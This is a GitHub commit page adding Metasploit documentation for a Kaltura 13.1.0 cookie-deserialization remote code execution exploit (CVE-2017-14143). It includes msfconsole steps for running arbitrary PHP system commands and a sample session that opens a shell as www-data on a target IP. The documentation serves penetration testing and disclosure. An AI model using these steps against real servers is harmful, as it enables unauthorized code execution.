Skip to content

Commit 8eb6df4

Browse files
committed
Land rapid7#9205, Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
Merge branch 'land-9205' into upstream-master
2 parents 685a950 + 04806bc commit 8eb6df4

File tree

1 file changed

+42
-0
lines changed

1 file changed

+42
-0
lines changed
Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
## Description
2+
3+
The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.
4+
5+
6+
## Vulnerable Application
7+
8+
This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
9+
Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
10+
Installation of Kaltura is difficult, but here is an installation guide:
11+
https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md
12+
13+
14+
## Verification Steps
15+
16+
1. Start msfconsole
17+
2. `use exploit/linux/http/kaltura_unserialize_cookie_rce`
18+
3. `set RHOST https://example.com (or IP address)`
19+
4. `set ENTRYID 0_xxxxxxxx`
20+
5. `set payload generic/custom`
21+
6. `set payloadstr "system('command you want to execute, eg.- ls -la');"`
22+
7. `run`
23+
24+
## Scenarios
25+
26+
```
27+
msf use exploits/linux/http/kaltura_unserialize_cookie_rce
28+
msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
29+
RHOST => 46.101.209.202
30+
msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
31+
LHOST => 192.168.1.16
32+
msf exploit(kalkutra_unseialize_cookie_rce)>check
33+
[+] 46.101.209.202:4444 The target is vulnerable.
34+
msf exploit(kalkutra_unseialize_cookie_rce)>run
35+
[*] Started bind handler
36+
[*] Output:
37+
[*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
38+
39+
id
40+
uid=33(www-data) gid=33(www-data) groups=33(www-data)
41+
```
42+

0 commit comments

Comments
 (0)